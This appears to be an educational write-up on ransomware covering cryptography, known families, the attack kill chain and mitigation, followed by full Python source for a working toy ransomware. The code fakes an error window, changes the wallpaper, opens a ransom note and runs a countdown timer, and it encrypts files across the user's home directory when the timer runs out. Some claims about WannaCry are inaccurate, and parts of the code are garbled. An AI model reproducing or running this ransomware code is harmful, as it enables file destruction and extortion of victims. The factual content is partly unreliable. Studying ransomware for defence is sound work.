Ransomware
Introduction to Ransomware
Ransomware is a type of malware that takes control over a victim‘s PC in an attempt to extort money (bitcoins). Modern day state of the art Ransomwares (which are Cryptographic) use AES-256 to encrypt files and require payment for decryption. It is typically attained from deceptive email links or websites. Currently, there are two types of ransomwares: Cryptographic Non-Cryptographic based.
Role of Cryptography in Ransomware
Malware / Ransomware use cryptography in order to hide its own code so that antivirus or security researchers cannot identify the actual code easily, communicate with its own command and control (C&C) Server and to encrypt the files on the victim machine.
A cryptographic system can have the following components:
- Plaintext
- Encryption key
- Ciphertext, which is the encrypted text
- Encryption algorithm, also called cipher
- Decryption algorithm
- There are two types of cryptographic algorithms based on the kind of key used:
- Symmetric
- Asymmetric
Advanced Encryption Standard (AES), the most used encryption algorithm in ransomwares uses a symmetric key. More advanced CGRs use a combation of both Symmetric and Asymmetric Keys (CryptoLocker is known to use both a symmetric key and an asymmetric key RSA)
Cryptographic Ransomware (CGR)
Cryptographic Ransomware (CGR) encrypts the files of the victim‘s device using „Strong Cryptographic“ Methods. These are methods that are considered highly resistant to cryptanalysis. The victim is informed of the encryption during an attack. A Timer is another component of the attack that is used to give the victim the feeling of urgency Main currency used for paying the ransom is Bitcoin because it is:
- Anonymous
- Difficult to track
- Transactions irreversible
CGR is not just one ransomware, but a family of malware that behave in a similar way Most common CGRs are:
- Jigsaw
- WannaCry
- Crypto Locker
- Police Ransomware
- Dirty Decrypt
- Torrent Locker
- Batch file Ransomware
- CryptoWall
Crypto Locker
CryptoLocker comes is a plethora of different forms, one of which the Torrent Locker ransomware. The standard variant Uses the advanced encryption standard AES-128 cryptosystem to encrypt the data on the host machine. In the latter variant, Torrent Locker, on the other hand, encrypts users’s files with the most advanced encryption standard implementation AES-256-CBC. AES 128 uses 10 rounds while AES 256 uses 14 rounds. The higher the number of rounds, the more complex the encryption and is therefore the reason why Torrent Locker is more ”secure”.
Non-Cryptographic Ransomware (NCR)
NCRs unlike CGRs Do not use any encryption and are applications that are designed to restrict computer interaction by locking screen or modifying Master Boot Record (MBR). It's for this reason that Sometimes refered to as scareware. They are relatively weak compared to CGR. Examples of NCR include:
- WinLocker
- Reveton
Ransomware Kill-Chain
- Distribution campaign – attackers use techniques like social engineering and weaponized websites to trick or force users to download a dropper which kicks off the infection
- Malicious code infection – the dropper downloads an executable which installs the ransomware itself
- Malicious payload staging – the ransomware sets up, embeds itself in a system, and establishes persistency to exist beyond a reboot
- Scanning – the ransomware searches for content to encrypt, both on the local computer and the network accessible resources
- Encryption – the discovered files are encrypted
- Payday – a ransom note is generated, shown to the victim, and the hacker waits to collect on the ransom
Encryption Kill-Chain stage
- Upon Infection, Cryptolocker connects to C&C and requests a public key
- RSA public and secret key pair is generated for the victim machine
- Public Key sent to the victim machine, Secret Key stays with C&C
- Ransomware generates AES Symmetric key for file encryption
- Encrypt the AES key with the RSA public key
- In order to decrypt files, AES key must be decrypted with private key in the C&C server.
Tools for Reverse Engineering and WannaCry
First seen in 2017, WannaCry Ransomware has a series of elements. It enters victim in the form of a „dropper“ which contains an executable that encrypts and decrypts files, a copy of Tor Browser and the Encryption Keys (Kill Switch). It is timed like Jigsaw Ransomware and should the victim fails to pay on time, all files are deleted including the encryption key. The ransomware demands 0.025 bitcoin ransom but can be much more for corperations
GHIDRA
Ghidra is a software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission.
Mitigation
Securing Networks and Systems before an attack
A “Prevention is better than cure” approach includes:
- Incident Response Plan
- Backups
- Antivirus Solutions
- Disable Macros scripts
- Keeping Systems up to date
- Restricted Network Access
Securing Networks and Systems during an attack
- Act Immediately
- Perform an Attack Analysis
- Determine if a decryptor is available
- Restore from a previous snapshot or backup
- Report the infection
Python Based CGR
Summary
This section demonstrates how to create a simple CGR in python. Instead of using standard AES for encryption, this application uses a Fernet key due to its simplicity. Fernet keys use a combination of two smaller keys:
- A 128 bit AES encryption key
- A 128 bit SHA256 signing key
Requirements
- Operating system: Ubuntu 18.04 bionic amd64
- Packages and Software: VMware Workstation Pro 12.x, Python 3.x, Anaconda Navigator, Atom IDE
Install Python 3.x and Anaconda Navigator. Clone the project from the github page: https://github.com/Mwape1997/AKITS_Ransomware.git
Main Secion of the Code
import os import webbrowser from os.path import expanduser from cryptography.fernet import Fernet #fernet keys have two smaller keys, a 128 bit AES key and a 128 bit SHA256 signing key import tkinter as tk from PIL import ImageTk, Image from multiprocessing import Process from threading import Thread import time from pathlib import Path
#Welcome to Somali FBI Ransomware! To start encryption: #python3 ransom.py --action encrypt #To decrypt files: #python3 ransom.py --action decrypt --keyfile ./path/to/keyfile
root = tk.Tk() root.title('Terminal')
# root2 = tk.Tk() # root2.title('FBI SOMALIA ALERT!') # root.wm_attributes('-fullscreen', 'true')
class Malware(object):
def __init__(self): self.key = None # key to encrypt the files self.cryptor = None # The encryptor self.file_ext_targets = ['jpg', 'txt', 'png' 'zip'] # our ransomware will encrypt txt files self.my_file = Path("~/Desktop/MENSA.txt") # the system will look for this file before starting the decryption process. self.flag = 0 self.time = 1000000
def mainscreen(self): termf = tk.Frame(root, height=400, width=500) w = tk.Label(root, text="Something went wrong...") button = tk.Button(text='Close', command=self.quitApp).pack() w.pack() root.mainloop() #This is a method that generates a key to unlock files and pass it to the crypter #verifies the key for decryption
def quitApp(self): root.destroy() ransom.writeKey("keyfile") ransom.encryptRoot(local_root)
# canvas.delete() self.root2 = tk.Tk() #self.root2.wm_attributes('-fullscreen', 'true') #self.canvas = tk.Canvas(self.root2, width=1366, height=800) #self.img = tk.PhotoImage(file="data/FBI.PNG") #self.canvas.create_image(20, 20, anchor=tk.NW, image=self.img) #self.canv as.pack() #root2.mainloop()
self.tick(30)
def tick(self, t):
while t: os.system('sh mi6.sh') #shell script to change the background is run constantly
if self.flag == 0: time.sleep(5) self.note = webbrowser.open('file://' + os.path.realpath('note.html')) #Ransomware not is generated self.flag += 1
mins, secs = divmod(t, 60) timer = '{:02d}:{:02d}'.format(mins, secs) print(timer, end="\r") time.sleep(1) if self.my_file.is_file(): webbrowser.open('file://' + os.path.realpath('success.html')) #Once the the ransom is payed, the success page is displayed ransom.readKey('keyfile') ransom.encryptRoot(local_root, encrypted=True) break
t -= 1
if t == 0 and not self.my_file.is_file(): webbrowser.open('file://' + os.path.realpath('fail.html')) #If timer runs out and there are no ransom paid, fail page is displayed sys_root = expanduser("~") #set new encryption directory to the root ransom.generateKey() #generate a key ransom.writeKey("keyfile") #write a key ransom.encryptRoot(sys_root) #start the encryption process
def generateKey(self): self.key = Fernet.generate_key() self.cryptor = Fernet(self.key)
read the key for decryption
def readKey(self, keyfileName):
with open(keyfileName, "rb") as f: self.key = f.read() self.cryptor = Fernet(self.key)
#Save decryption key to a file
def writeKey(self, keyFileName): print(self.key) with open(keyFileName, "wb") as f: f.write(self.key)
encrypt or decrypt files from root directory
def encryptRoot(self, rootDir, encrypted=False): for root, _, files in os.walk(rootDir): for f in files: abs_files_path = os.path.join(root, f) # pass if no target files is present in current folder if not abs_files_path.split(".")[-1] in self.file_ext_targets: continue self.encryptFile(abs_files_path, encrypted=encrypted)
encrypt and decrypt files
def encryptFile(self, filePath, encrypted=False): with open(filePath, "rb+") as f: _data = f.read() if not encrypted: # perform encryption print() print(f"File Contents before encryption: {_data}") data = self.cryptor.encrypt(_data) print(f"File contents after encryption: {data}") else: # decrypt data = self.cryptor.decrypt(_data) print(f"File content before encryption: {data}") f.seek(0) f.write(data)
if __name__ == "__main__": # sys_root = expanduser("~") # Use to encrypt every folder from root local_root = expanduser("~/Downloads") # Use to encrypt specific folder
import argparse
parser = argparse.ArgumentParser() parser.add_argument("--action", required=True) parser.add_argument("--keyfile")
args = parser.parse_args() action = args.action.lower() keyfile = args.keyfile
ransom = Malware()
if action == "decrypt": if keyfile is None: print("Path to keyfile must be specified after --keyfile for decryption") else: ransom.readKey(keyfile) ransom.encryptRoot(local_root, encrypted=True) elif action == "encrypt": Thread(target=ransom.generateKey()).start() Thread(target=ransom.mainscreen()).start() # ransom.tick() # ransom.canvas.after(1, ransom.tick()) # ransom.root2.mainloop()
# ransom.generateKey()
# python3 ransom.py --action encrypt # python3 ransom.py --action decrypt --keyfile ./path/to/keyfile
References
- A. Chuquilla, T. Guarda and G. Ninahualpa Quiña, "Ransomware -
WannaCry Security is everyone's," 2019 14th Iberian Conference on Information Systems and Technologies (CISTI), Coimbra, Portugal, 2019, pp. 1-4, doi: 10.23919/CISTI.2019.8760749
- Gonzalez, D. and Hayajneh, T., n.d. Detection And Prevention Of Crypto-Ransomware.